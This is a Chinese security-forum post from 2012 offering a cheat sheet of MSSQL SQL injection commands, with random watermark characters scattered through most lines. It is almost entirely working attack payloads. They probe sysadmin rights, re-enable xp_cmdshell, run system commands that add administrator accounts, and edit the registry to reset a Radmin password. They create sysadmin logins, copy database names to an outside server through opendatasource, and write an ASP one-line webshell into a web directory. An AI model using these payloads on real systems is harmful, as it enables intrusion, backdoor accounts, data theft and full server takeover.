找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2019|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的# X& S. I' l2 d9 w3 D' F
and 1=(Select IS_MEMBER('db_owner'))
3 ~8 x4 h0 {1 W& _3 h' `3 TAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--6 Z! G6 B; Z$ `7 V1 i( r
* d# z, R# w5 @3 o. c
//检测是否有读取某数据库的权限; a/ S' s: W; ]
and 1= (Select HAS_DBACCESS('master'))- V$ k, x5 Z# K9 k3 }& J1 @
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
) o8 O; F* o5 y# C  V" w
7 o# C! y1 k) I; d1 C
; R3 M' `( }2 h& T数字类型- n: l  ~3 @8 [; R5 e
and char(124)%2Buser%2Bchar(124)=00 V& t- z9 H5 W) h  ~4 c

+ d" _2 H& E8 N+ e" W. z' R$ ?5 ?. K字符类型
# T: I4 m2 U8 t8 _5 m' and char(124)%2Buser%2Bchar(124)=0 and ''='
, p2 O6 ]: `) |; r- v, T7 c9 S) N% u- T8 ~2 ?4 ?
搜索类型& ~' x1 z: D  N! f' P, M/ [
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
7 o+ a5 f5 g2 F+ n, @0 e* e* a0 g/ d& Y, @3 W
爆用户名
9 }  b0 {4 S5 `# [2 v! Y6 w3 Fand user>0( u. T2 Y& m: j; ]
' and user>0 and ''='6 R* R7 q: ^- @' Z7 a

. a+ H& q2 |, |# }0 C检测是否为SA权限* n- @9 u, D0 f; n
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--8 p# _: k( }- }8 ]8 j
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --8 S  J$ F2 m( ~' }/ X* g( [9 n

- l6 B/ V" X( N$ [/ k  H" @检测是不是MSSQL数据库
! P7 A% S: X- q# m6 I0 aand exists (select * from sysobjects);--
. Z6 B# j9 N  u$ n8 h0 z* V1 ~. s" c. c2 f/ R% C
检测是否支持多行! P$ I  `5 \% k1 @
;declare @d int;--) ~6 F  i' B" ~6 Z: K2 V

+ M+ ?- A, _4 o恢复 xp_cmdshell6 t5 m/ T8 {* N9 m
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
" I. k" j, s! `; d6 ~: i! d% \# m$ c

% c; N' B3 A5 Q% J7 mselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
1 |% x) _6 e" Z6 S6 y  K+ ^# W# v
* g( e+ g* a' L% t$ o//-----------------------% \4 q. R8 L) ^; M/ @7 R
//       执行命令( I! ?8 c" U* D
//-----------------------
- \. ^9 z4 S  D2 o9 }; v首先开启沙盘模式:
' w5 h( ^, d, qexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',16 X8 ]+ t% X* P
8 Y- s9 H5 A+ ^# S0 B4 y0 |
然后利用jet.oledb执行系统命令0 e# y* K% t; O" j+ `6 {7 R% \
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
- G2 p1 y  U. |$ B6 n1 z8 z: X
; @% W& N3 l. n' }2 }7 y/ J执行命令2 `- ^$ i$ E% I% k# w
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
+ c0 u- |! X/ }- d
( t+ M0 i7 y' b' H0 f- vEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
$ M1 F7 G* ^& |3 |! W4 |
% C1 B) j. u2 g  y4 I判断xp_cmdshell扩展存储过程是否存在:  m% i" ?$ E* ]1 J! Y, j! r
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')  e. M" n: {: k6 @3 j2 Q. m6 E0 E

+ {+ |3 [4 W! Q# H4 q& V3 w写注册表
5 q$ l4 [0 U& ]" v6 d5 B1 Y" Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. L% h4 |+ H' B7 @% W/ r2 ?0 y/ D' C. {; ?
REG_SZ9 u- D  ?1 \/ v2 H6 n% ?3 v

# T+ P" k5 B7 H9 J7 f读注册表' {  e- W! y1 m+ f: R
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& |$ y- L4 u; c. r$ u/ i# u: R! C% N6 ^5 d0 |
读取目录内容
) O+ t) y, ~8 hexec master..xp_dirtree 'c:\winnt\system32\',1,1
9 S3 u: P( r0 ]) g
; q! N1 r% f8 C, B- ~7 B$ l8 a! x9 n7 X) l( @1 {3 R; {7 J
数据库备份2 h! q& R$ A4 W* E2 U
backup database pubs to disk = 'c:\123.bak'
6 T/ ]9 H* i7 y! {5 [5 \
- U/ R% A9 s/ ~- f& Q) ?9 ]//爆出长度3 x" \$ g( }" K; J: T% L2 o6 m- g
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
# A" _; [' l) W2 s* l5 l. C6 {
7 e7 t4 T2 g7 o  A
6 N2 ~  o9 [. t# Z. g, t% i2 m2 \( M- Y0 R- K6 z
更改sa口令方法:用sql综合利用工具连接后,执行命令:9 n- j  r% r! n9 C7 Z
exec sp_password NULL,'新密码','sa'
* ~& H2 `! G8 t; ^/ U8 U( C0 |4 P4 @+ M5 ], |4 z
添加和删除一个SA权限的用户test:/ m3 ^! _$ ~/ h+ }( C& Z/ a
exec master.dbo.sp_addlogin test,9530772
- g$ p) K; ]4 }# y& |# {6 c7 Aexec master.dbo.sp_addsrvrolemember test,sysadmin
" i2 k9 U) k, e, i0 b9 Q; f
" V9 @8 Y4 A0 V" m6 _5 z删除扩展存储过过程xp_cmdshell的语句:' g0 b( t2 \' M9 ?
exec sp_dropextendedproc 'xp_cmdshell'7 T" M! L6 A' r2 T2 \0 p: J) l" i
; z" y* _0 V3 x1 O- b
添加扩展存储过过程' {- S! j" s+ i! O( f1 p( a. Y( C
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
5 ]8 R& `- s. ?# {, Y6 E# CGRANT exec On xp_proxiedadata TO public
0 Q( k& S# ?7 F( k7 D0 ?! q' ^0 m. L
% w2 j2 F6 z# @1 p3 X, s
停掉或激活某个服务。
+ c; ~, G# m4 ^. k5 W8 l/ B0 D! c5 M2 [/ H, I8 {5 c
exec master..xp_servicecontrol 'stop','schedule'
; z5 |/ s+ `0 j( oexec master..xp_servicecontrol 'start','schedule'0 w1 c$ E, |2 ^" ~( X  i5 x
2 |+ }: R% X  F6 v, O/ b! Y2 ~! o
dbo.xp_subdirs  O$ s) p" x2 u5 O2 g$ f
2 y$ {2 s0 H, N) W" Z
只列某个目录下的子目录。
: ^: l+ G0 j" ^. g! Jxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
; A5 @# e( |! p0 X
8 G; j0 M. m$ y9 C! C1 }dbo.xp_makecab
) ?4 ]+ z& H( q, |$ T: S& `' {: |: \4 r! ~. G+ L2 k
将目标多个档案压缩到某个目标档案之内。
. p+ |! V3 ]# |5 a( w: P; g; ~; O所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
: Q. N* U: M6 \7 p  V$ _1 _) }) H7 B' a! a" e* x" ?. K$ V6 v* h- j& d3 w
dbo.xp_makecab( c* c% S( g3 O% l( R0 a
'c:\test.cab','mszip',1,3 s, g, w' A' E+ y9 y& H* [% J
'C:\Inetpub\wwwroot\SQLInject\login.asp',
* _; A* K+ @, P+ Y5 s0 V'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
! g# i- P1 P% Q' T7 `) K1 s
5 O( V0 d9 ^- _) ]+ s3 sxp_terminate_process7 n* b7 Q' |0 r! t2 k

+ J3 j* W% v& t+ b' s- i  M. u停掉某个执行中的程序,但赋予的参数是 Process ID。
* n" X1 Z% h: ~; R5 u9 b) t- F利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
! h# [3 x/ u' b7 l5 o; d, w6 z4 ^# _, m) i" |7 p
xp_terminate_process 2484' w% X- @. }. g- S  ~
& P  M! R! e+ V  Q* D
xp_unpackcab# h" y' V. h: _, |% o0 `

9 a7 N9 N& U' m6 A解开压缩档。+ X, d* ~' C3 a8 u" _

4 N- r, L+ j* d) U: |! wxp_unpackcab 'c:\test.cab','c:\temp',1; g5 M; a! e- m

. i/ v( d$ x0 W
( o: \3 c8 w4 h& H, }某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12347 W+ O/ \, l9 b; H# ?4 d

9 ?& K, J$ `$ ^" M$ {: Ncreate database lcx;
( f+ t* e$ ]! B* TCreate TABLE ku(name nvarchar(256) null);& O$ h! ]4 ^: c. x
Create TABLE biao(id int NULL,name nvarchar(256) null);
' V3 H( S# U! x0 L+ j
  c  |3 F) r" J" B/ t' L) `//得到数据库名# b/ B5 y) i8 M( Y9 |) B0 }
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
5 [6 Y" j& ~: B" U3 Z
' s; g8 R  u7 p( U6 V$ i+ y- p6 X. g  G, z
//在Master中创建表,看看权限怎样5 M. b/ L6 @$ R* t) F6 N
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--  n0 e3 n# F! y+ h2 h, @* O# V
( X; t; ]4 P+ N7 D+ E: f
用 sp_makewebtask直接在web目录里写入一句话马:
: s0 y/ N( R- X- F/ J  s0 Mhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
9 r& f$ w1 _( b) C5 @
/ m0 E) }1 @7 k//更新表内容9 U* {! U6 x- s# @3 F6 O# W
Update films SET kind = 'Dramatic' Where id = 123
9 ]/ M; L" h0 H  l, Q- T' j  s0 m/ \: ~( l* U
//删除内容
6 N& Z) q; f/ l5 z& Q1 S3 gdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表